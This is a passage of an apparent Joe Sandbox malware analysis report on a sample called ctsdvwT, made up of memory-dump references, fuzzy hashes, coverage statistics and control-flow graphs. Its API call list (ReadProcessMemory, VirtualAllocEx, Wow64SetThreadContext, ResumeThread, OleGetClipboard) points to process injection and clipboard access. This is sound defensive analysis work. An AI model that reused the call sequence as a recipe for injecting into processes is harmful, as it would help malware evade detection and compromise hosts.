                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07087828
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 4e993504275b451c43a887de4230f746937a149c11e99049a640795840a29ba7
                                            • Instruction ID: 59b9a653e88bdd3567f94eb8b2aa6f3d59a12810664fbc984a3437b9418d84ef
                                            • Opcode Fuzzy Hash: 4e993504275b451c43a887de4230f746937a149c11e99049a640795840a29ba7
                                            • Instruction Fuzzy Hash: BC2128B1C002499FCB10DFAAC840AEEFBF5FF48310F508429E559A7250D7389540DBA1
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07087166
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 8b16dcc0db54abb86771239ccd35d2776c17be14e955ed9fa71b057c59d3da75
                                            • Instruction ID: f1c3aa747d100e5a546e2b8f670708aba6ce064baf70542ac9c1ae8750eb6edc
                                            • Opcode Fuzzy Hash: 8b16dcc0db54abb86771239ccd35d2776c17be14e955ed9fa71b057c59d3da75
                                            • Instruction Fuzzy Hash: 632135B1D002098FDB50DFAAC8857EEBBF5EF49310F24842AD559A7340CB78A944CFA4
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD64F
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: b96f0b3755faa78cd5dde8e2cca1b7c74f48b3e1d0f9fa4c608fd38593ba09e1
                                            • Instruction ID: 5f652848628c02f23eca6b0f3c012c66233b7d5745ecdfb58f632fabae9f4e98
                                            • Opcode Fuzzy Hash: b96f0b3755faa78cd5dde8e2cca1b7c74f48b3e1d0f9fa4c608fd38593ba09e1
                                            • Instruction Fuzzy Hash: 1F21E4B59002089FDB10CF9AD584ADEBFF9FB48310F14841AE918A3310D378A940CFA4
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012CD64F
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: e18c7ec6a9535337c58a0fe9ed9ffd07934a90a71c7cb3fd34ca4b001263dc9b
                                            • Instruction ID: 370919dc03a09cc0f507787eddf29332e018c69b3cffe73d7f04458992182137
                                            • Opcode Fuzzy Hash: e18c7ec6a9535337c58a0fe9ed9ffd07934a90a71c7cb3fd34ca4b001263dc9b
                                            • Instruction Fuzzy Hash: 4A21C2B5900209DFDB10CFA9D984ADEBBF5FB48310F14842AEA18A7350D379A954CFA4
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07087666
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: bcb29acf52aed08fc3d4b195c7c8122dce2c4dd630a2c1933d735b688b5db948
                                            • Instruction ID: ae93ab2a563a589b08d6b8bdfce32397fdb35af0085abbc3cba0988582e71d02
                                            • Opcode Fuzzy Hash: bcb29acf52aed08fc3d4b195c7c8122dce2c4dd630a2c1933d735b688b5db948
                                            • Instruction Fuzzy Hash: C2116AB18002499FCB10DFAAC844AEFFFF5EF48310F208819E559A7250C735A540CFA1
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07087666
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 170ad10842290c49542044d25b6efef0e3e2a2b6a11b098c2b8f84281c720f27
                                            • Instruction ID: 1ef6285fc76396fb2080268e7efe392fe1b4389790fcd094af36b45ac51cd33b
                                            • Opcode Fuzzy Hash: 170ad10842290c49542044d25b6efef0e3e2a2b6a11b098c2b8f84281c720f27
                                            • Instruction Fuzzy Hash: 881137B18002499FCB10DFAAC844AEFBFF5EF48310F248819E559A7250C779A550CFA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 7abc430ba51356e3653fde9dcefe908e28f5e7e4b618c2f992732fd3f1dc7fe0
                                            • Instruction ID: efa5f4f6a70da9bbd16393c44de76be361ae936ad9775c83b795aacc74f6c1a4
                                            • Opcode Fuzzy Hash: 7abc430ba51356e3653fde9dcefe908e28f5e7e4b618c2f992732fd3f1dc7fe0
                                            • Instruction Fuzzy Hash: 6F1149B18002488BCB10DFAAD4456EEFFF5EF48324F108819D519A7240CB79A545CBA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 59e452f2610ea199aab86a931ea5d790eb7c09fc2463ee9e238f5acdd9e804bb
                                            • Instruction ID: 8fdd028759eb57494479352cb5ca6e491c8b124d707b32c6a87b6d1a00faf0b3
                                            • Opcode Fuzzy Hash: 59e452f2610ea199aab86a931ea5d790eb7c09fc2463ee9e238f5acdd9e804bb
                                            • Instruction Fuzzy Hash: A41128B19002498BCB10DFAAC4457AEFBF5EF88314F248819D559A7240CB79A544CFA4
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 012CB33E
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 1f581b33d93117493703b107da8f1e93ec18c99cad0ba32ccf93027f1579f26d
                                            • Instruction ID: 68a026d683cd5581cae6d5e11100d9f45262a4770771e2104216cf281ac70103
                                            • Opcode Fuzzy Hash: 1f581b33d93117493703b107da8f1e93ec18c99cad0ba32ccf93027f1579f26d
                                            • Instruction Fuzzy Hash: 5C1122B6C003498FDB10CF9AD444ADEFBF8EF88710F14852ADA19A7200C379A545CFA1
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0708A835
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 2066328795d439f7b428ceb83ec0022ab4456e29066016dbba62d057ce490d13
                                            • Instruction ID: b63f1793868b7d8504597e29f73e601e45a6610fc552125228812052428dcefe
                                            • Opcode Fuzzy Hash: 2066328795d439f7b428ceb83ec0022ab4456e29066016dbba62d057ce490d13
                                            • Instruction Fuzzy Hash: 0F11F2B5800349DFDB10DF9AD845BDEBFF8EB48320F10881AE558A7600C379A944CFA5
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0708A835
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 4a29ec0e04bfc6970723a862eb49f73d16431fdcfe239071dfae0a7b6fcc370d
                                            • Instruction ID: 41720e787eac60bc984bc2b8545ac07b0cfc6ac083310cfe7a67ebf716b9565c
                                            • Opcode Fuzzy Hash: 4a29ec0e04bfc6970723a862eb49f73d16431fdcfe239071dfae0a7b6fcc370d
                                            • Instruction Fuzzy Hash: 851106B5900349DFDB50DF99C444BDEBFF8EB49310F10885AE958A7600C375A944CFA5
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d32c8f75e5f64e9789230f3d42551710fac50ee6f3823187c1a639fff76087e
                                            • Instruction ID: 28d9ec69b911dee01d706ee399fa30f602523f0e4cf691fabddc0fa1a98012b4
                                            • Opcode Fuzzy Hash: 7d32c8f75e5f64e9789230f3d42551710fac50ee6f3823187c1a639fff76087e
                                            • Instruction Fuzzy Hash: 7F21F171548240DFCB15DF14E980F26BF65FB98318F20C56AE9091A356C33AD816DBA2
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da0349485603d750337c9db82b41cb835353d8afdbe9cd4c8a6d0cc836287727
                                            • Instruction ID: 8ae373938ca6bd30b328ddf8ae41e7bd41cc1f0e1351487295bfd3bc599b1d6f
                                            • Opcode Fuzzy Hash: da0349485603d750337c9db82b41cb835353d8afdbe9cd4c8a6d0cc836287727
                                            • Instruction Fuzzy Hash: 0C213371108204DFCB15DF14C9C0F26BF69FB98328F20C16AE9095B356C33AE817CAA2
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f669e37c790f1a2f40983831f27f4ddbc889fdc5456c7f9d567a777cb6f03e1
                                            • Instruction ID: 2a4334b7dfd51ea332f465edc2d2c72c2c268507109f587dc480d67bbecd344e
                                            • Opcode Fuzzy Hash: 3f669e37c790f1a2f40983831f27f4ddbc889fdc5456c7f9d567a777cb6f03e1
                                            • Instruction Fuzzy Hash: 7321F571508288DFCB15DF24D984B16BF66FB84314F28C569D9095B296C33AD807CA61
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 73f1e37908911882341d3f05dbb9bdb4d0aa94aed9f74ff197df511ab279648b
                                            • Instruction ID: d7c7b1a50037dcf904766408d12cae8fcd11c73434de4ddbb3a1040b8563cfe4
                                            • Opcode Fuzzy Hash: 73f1e37908911882341d3f05dbb9bdb4d0aa94aed9f74ff197df511ab279648b
                                            • Instruction Fuzzy Hash: 16213771508288DFCB05DF65D9C0F26BB65FB88318F20C56DDA095B3A6C33AD806CA61
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67526475ddc136cc27d5262c8c6e9f9e769c1ca261280307e2220a7a8af6e323
                                            • Instruction ID: 4fe7bf22267baa7edf83e37f1305f1d7cd0b918b112bed2b05ba2cf136211ab7
                                            • Opcode Fuzzy Hash: 67526475ddc136cc27d5262c8c6e9f9e769c1ca261280307e2220a7a8af6e323
                                            • Instruction Fuzzy Hash: 6921507550D3C48FDB12CF24D994715BF72EB46314F28C5EAD8498B6A7C33A980ACB62
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: 907cee5e6acc8a89b2e0a188b7f592ba09e37e907368928545c021386fb69cc6
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: CD110672404240CFCB12CF10D9C4B16BF71FB94318F24C6AAD8450B356C336D456CBA1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction ID: e98926b3a3db327831fa834aea1bdded033e17748649dbcd2e5e388df199d498
                                            • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                            • Instruction Fuzzy Hash: 95110372404240DFCB12CF00D9C4B16BF71FB94328F24C6AAD9090B356C33AE85ACBA2
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194142655.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_eed000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: b364829fee392a2a6c870231575de244ed384b08687afe4b398073a64e4fc5d2
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 8811BB75508284DFCB02CF50C9C4B15BBA1FB88318F24C6A9D9494B2A6C33AD81ACB62
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0f15cdd5c395d14a6f5b72883645446dc8c1bbc9cf5e78b5cb07462a9658b5a
                                            • Instruction ID: 83cf4c7b765ed6ba34e8fbd70e2240e04ae716d85633f90596d131da229907d0
                                            • Opcode Fuzzy Hash: a0f15cdd5c395d14a6f5b72883645446dc8c1bbc9cf5e78b5cb07462a9658b5a
                                            • Instruction Fuzzy Hash: 21012B310083409AE7208E15CD84BA7BF9CEF46324F18D5ABED085F386C2399802CAB1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2194081252.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_edd000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b7a84f32d28bc7683566bdb0850d4b6e31844649462a13c6e97e55234e17f2d6
                                            • Instruction ID: 11b4cf6227929b2f83da3bb1eef439887e6ebd5c959445ced7488a215e37bd15
                                            • Opcode Fuzzy Hash: b7a84f32d28bc7683566bdb0850d4b6e31844649462a13c6e97e55234e17f2d6
                                            • Instruction Fuzzy Hash: BDF062714083449AE7208E16DC88BA6FF98EF56734F18C45BED485B386C2799845CAB5

                                            Execution Graph

                                            Execution Coverage:11.6%
                                            Dynamic/Decrypted Code Coverage:92.7%
                                            Signature Coverage:0%
                                            Total number of Nodes:193
                                            Total number of Limit Nodes:22
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,btq
                                            • API String ID: 0-3970051468
                                            • Opcode ID: 092bd721dd544ad7f8bd144fa2e6dc3c9b4cad80af668f2a9555b091063af6fd
                                            • Instruction ID: 2d50b4af0082f2993710475a5d199cfd2f0709ce8ddc28dcd3af0fcaa5b3e271
                                            • Opcode Fuzzy Hash: 092bd721dd544ad7f8bd144fa2e6dc3c9b4cad80af668f2a9555b091063af6fd
                                            • Instruction Fuzzy Hash: D133FC31D1061A8EDB11EF68C8806ADF7B1FF99300F15C79AD459A7221EB70EAD5CB81
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a49bf972a5eee3f825462ea49d29fa961d9cf72d8def768283948c424f2d512
                                            • Instruction ID: 8bfa0272fd1456dfa7b8cbf565ba26ddfb27abe20b532bcdd50f9caedbcb5f38
                                            • Opcode Fuzzy Hash: 9a49bf972a5eee3f825462ea49d29fa961d9cf72d8def768283948c424f2d512
                                            • Instruction Fuzzy Hash: B453E631D10B1A8ACB51EF68C8805ADF7B1FF99300F15D79AE458B7121EB70AAD5CB81
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3cb42a01395861cf7778df5edd99d2857790211770fcdf6a18222fadedd88895
                                            • Instruction ID: e68846e49ea3d1d5ab4814113afe3563c263a42edd93f5c2b0ad929e150a3827
                                            • Opcode Fuzzy Hash: 3cb42a01395861cf7778df5edd99d2857790211770fcdf6a18222fadedd88895
                                            • Instruction Fuzzy Hash: 2AB13A70E002098FDB14CFA9C9857ADBFF2AF88318F148529D859E7294EB74D985CB81
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2258445305.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1870000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a41ea304b8465933be8b178b7c8d43988cabecb0f08d9fa4deb47c84b8afa27a
                                            • Instruction ID: c4cd5d26fc763131e61db8ef1f75d252a1878af1c458a8ed106ed92d2a872602
                                            • Opcode Fuzzy Hash: a41ea304b8465933be8b178b7c8d43988cabecb0f08d9fa4deb47c84b8afa27a
                                            • Instruction Fuzzy Hash: 31915A70E002099FDF10DFA9D9817ADBBF2BF88314F148129E819E7254EB349985CB92

                                             Control-flow Graph
                                             • Blocks: 1417 6868993-6868994; 1418 6868996-68689fe; 1419 6868921-6868945; 1420 6868a00-6868a06; 1421 6868a09-6868a10; 1423 6868a12-6868a18; 1424 6868a1b-6868a53; 1425 6868a5b-6868aba CreateWindowExW; 1426 6868ac3-6868afb; 1427 6868abc-6868ac2; 1431 6868afd-6868b00; 1432 6868b08; 1433 6868b09
                                             • Edges: 1417->1418, 1417->1419, 1418->1420, 1418->1421, 1419->1417, 1420->1421, 1421->1423, 1421->1424, 1423->1424, 1424->1425, 1425->1426, 1425->1427, 1426->1431, 1426->1432, 1427->1426, 1431->1432, 1432->1433, 1433->1433
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06868AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 96a35a68c7cc92689bb40b1649e28649c842d8b22ed09a0ba445221b12d08010
                                            • Instruction ID: 90411802127e79ffeec37223df20bf1a79cc525bf375434f6fd9ef08320b48ea
                                            • Opcode Fuzzy Hash: 96a35a68c7cc92689bb40b1649e28649c842d8b22ed09a0ba445221b12d08010
                                            • Instruction Fuzzy Hash: 7D5102B1C00349AFDB11CFAAC984ADDBFB5FF49300F24816AE858AB251D7749885CF91

                                             Control-flow Graph
                                             • Blocks: 1434 6868998-68689fe; 1435 6868a00-6868a06; 1436 6868a09-6868a10; 1437 6868a12-6868a18; 1438 6868a1b-6868aba CreateWindowExW; 1440 6868ac3-6868afb; 1441 6868abc-6868ac2; 1445 6868afd-6868b00; 1446 6868b08; 1447 6868b09
                                             • Edges: 1434->1435, 1434->1436, 1435->1436, 1436->1437, 1436->1438, 1437->1438, 1438->1440, 1438->1441, 1440->1445, 1440->1446, 1441->1440, 1445->1446, 1446->1447, 1447->1447
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06868AAA
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 56533e1d0e624fc74d503446fb9e303193d3061c22f3e161c20fbd03abdf601a
                                            • Instruction ID: 864a839d2b0888bd706f0f3e17631c757fa36e879791589f035af528ed0d2b26
                                            • Opcode Fuzzy Hash: 56533e1d0e624fc74d503446fb9e303193d3061c22f3e161c20fbd03abdf601a
                                            • Instruction Fuzzy Hash: 5641C0B1D00309AFDB14CF9AC984ADEBBB5FF48314F24812AE818BB250D775A945CF91

                                             Control-flow Graph
                                             • Blocks: 1448 686c2ac-686d5c4; 1451 686d674-686d694 call 6866c44; 1452 686d5ca-686d5cf; 1459 686d697-686d6a4; 1454 686d622-686d65a CallWindowProcW; 1455 686d5d1-686d608; 1457 686d663-686d672; 1458 686d65c-686d662; 1462 686d611-686d620; 1463 686d60a-686d610
                                             • Edges: 1448->1451, 1448->1452, 1451->1459, 1452->1454, 1452->1455, 1454->1457, 1454->1458, 1455->1462, 1455->1463, 1457->1459, 1458->1457, 1462->1459, 1463->1462
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0686D649
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 082d24778911c14d64a075e29d28f566924fede1194fc64d1d400ab35f92a030
                                            • Instruction ID: fd66377f4df19dcb7827dfac4e8da30f20c8cad5321fd86cd7a7b0cf91e93d30
                                            • Opcode Fuzzy Hash: 082d24778911c14d64a075e29d28f566924fede1194fc64d1d400ab35f92a030
                                            • Instruction Fuzzy Hash: 16412DB4A003458FDB54CF9AC488AAEBBF5FF88314F14C459E619AB321D374A840CFA0

                                             Control-flow Graph
                                             • Blocks: 1465 686c7b8-686c7c5; 1466 686c7c7-686c8e6; 1467 686c760-686c78c DuplicateHandle; 1468 686c795-686c7b2; 1469 686c78e-686c794
                                             • Edges: 1465->1466, 1465->1467, 1467->1468, 1467->1469, 1469->1468
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0686C77F
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 1803a5c15d5f3f4963955d9193b8ad3d309594b5e405d813d5f5f04eddf91ad5
                                            • Instruction ID: 7e3b7f4189da48f35b370e5ed3388d627ce4f3cdbc0e8ca17b88f251208a83d6
                                            • Opcode Fuzzy Hash: 1803a5c15d5f3f4963955d9193b8ad3d309594b5e405d813d5f5f04eddf91ad5
                                            • Instruction Fuzzy Hash: F94140B8A44340DFEB019FA8F8496797FBAFB4A700F10D12AE9559B385DB794805CF10

                                             Control-flow Graph
                                             • Blocks: 1482 686e2cc-686e328; 1483 686e332-686e370 OleGetClipboard; 1484 686e372-686e378; 1485 686e379-686e3c7; 1490 686e3d7; 1491 686e3c9-686e3cd; 1492 686e3cf; 1493 686e3d8
                                             • Edges: 1482->1483, 1483->1484, 1483->1485, 1484->1485, 1485->1490, 1485->1491, 1490->1493, 1491->1490, 1491->1492, 1492->1490, 1493->1493
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: a0836cab353cecb35e2decdec5c8161e9d71a8d87bc9298f2a281a9a7c033c3e
                                            • Instruction ID: 28f877112ada0e66764dc8c222ef426ac6e4ae5ca4c2b362f030ec78a8e67400
                                            • Opcode Fuzzy Hash: a0836cab353cecb35e2decdec5c8161e9d71a8d87bc9298f2a281a9a7c033c3e
                                            • Instruction Fuzzy Hash: 8D3143B0D01248DFDB10CFA9CA88BCEBBF1EF48304F248019E144AB3A0D7B45945CB65

                                             Control-flow Graph
                                             • Blocks: 1494 686dcc8-686e370 OleGetClipboard; 1497 686e372-686e378; 1498 686e379-686e3c7; 1503 686e3d7; 1504 686e3c9-686e3cd; 1505 686e3cf; 1506 686e3d8
                                             • Edges: 1494->1497, 1494->1498, 1497->1498, 1498->1503, 1498->1504, 1503->1506, 1504->1503, 1504->1505, 1505->1503, 1506->1506
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2267238985.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_6860000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 521af85f89d782327b1ad9527c60a72e9dab374bf6c69bbc7c4d1cf70deb3ddf
                                            • Instruction ID: d7456bde22846224aa0fb318845248d1cba53ffab4f115856834ac99e2165f22
